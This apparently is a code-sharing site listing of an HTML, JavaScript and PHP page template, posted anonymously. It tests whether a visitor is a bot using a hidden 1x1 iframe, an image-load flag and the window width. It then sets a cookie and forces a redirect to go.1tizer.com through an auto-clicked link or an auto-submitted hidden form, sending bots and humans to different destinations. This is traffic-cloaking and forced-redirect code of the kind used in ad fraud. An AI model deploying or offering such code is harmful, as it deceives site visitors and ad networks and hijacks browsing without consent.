PhpRiot

Listing 1749

Followup to listing-1748.txt, submitted by anonymous user.

Submitted by anonymous user, 6 January 2026
<body onLoad='startTestBot();'>
<img src='img.jpg' onLoad='setFlagImg();'>
<script>
var loadImgFlag=0;
</script>
<!-- &#1042;&#1089;&#1077; &#1086;&#1089;&#1090;&#1072;&#1083;&#1100;&#1085;&#1086;&#1077; -->
<script>
function redirect(url)
    {
              if(navigator.appName == "Microsoft Internet Explorer")
        {
            document.getElementsByTagName('body')[0].innerHTML='<a id="idMegaA" href="http://go.1tizer.com/super.php?spectrum=<?=$str0?>&b=<?=$min2?>&d=<?=$ident?>&m=<?=$unicid?>&g=' + url + '"><font color="red"><b>&#1055;&#1086;&#1076;&#1086;&#1078;&#1076;&#1080;&#1090;&#1077;, &#1080;&#1076;&#1077;&#1090; &#1079;&#1072;&#1075;&#1088;&#1091;&#1079;&#1082;&#1072;...</b>!</font></a>';
            idMegaA.click();   
        }
        else
        {
            document.getElementsByTagName('body')[0].innerHTML='<form action="http://go.1tizer.com/super.php" name="nameForm" method="get"><input type="hidden" name="spectrum" value="<?=$str0?>"><input type="hidden" name="d" value="<?=$ident?>"><input type="hidden" name="b" value="<?=$min2?>"><input type="hidden" name="m" value="<?=$unicid?>"><input type="hidden" name="g" value="' + url + '""></form>';
            document.forms['nameForm'].submit();
        }
    }
    function getClientWidth()
    {
        return document.compatMode=='CSS1Compat' && !window.opera?document.documentElement.clientWidth:document.body.clientWidth;
    }
    function setFlagImg()
    {
        loadImgFlag=1;
    }
    function checkImg()
    {
        if(loadImgFlag==1)
            return true;
        if(loadImgFlag==0)
            return false;
    }
 
    function getCookie(name)
    {
        var cookie = " " + document.cookie;
        var search = " " + name + "=";
        var setStr = null;
        var offset = 0;
        var end = 0;
        if (cookie.length > 0) {
            offset = cookie.indexOf(search);
            if (offset != -1) {
                offset += search.length;
                end = cookie.indexOf(";", offset)
                if (end == -1) {
                    end = cookie.length;
                }
                setStr = unescape(cookie.substring(offset, end));
            }
        }
        return(setStr);
    }
    function setCookie (name, value, expires, path, domain, secure) {
        document.cookie = name + "=" + escape(value) +
        ((expires) ? "; expires=" + expires : "") +
        ((path) ? "; path=" + path : "") +
        ((true) ? "; domain= 1tizer.com" : "") +
        ((secure) ? "; secure" : "");
    }
    var newtext=document.createTextNode('');
    var newelement=document.createElement("DIV");
    newelement.id="newifram";
    newelement.appendChild(newtext);
    document.body.appendChild(newelement);
    document.getElementById('newifram').innerHTML='<iframe height=1 width=1 style="visibility:hidden" name="tizer" id="afsdkah">';
    var date2 =new Date();
    date2.setSeconds(date2.getSeconds()+4);
    function startTestBot()
    {
        if(getClientWidth()>0 && document.getElementById('afsdkah')!=false && checkImg()!=false)
        {   self.focus();
            setCookie('<?=$unicid?>','<?=rawurlencode(base64_encode($arr['nebot']));?>',date2); 
            redirect(<?=$varNeBot?>);
        }
        else
        {   self.focus();
            setCookie('<?=$unicid?>','<?=rawurlencode(base64_encode($arr['bot']));?>',date2);    
            redirect(<?=$varBot?>);
        }
    }
</script>
</body>
Submit a Follow Up

Followups: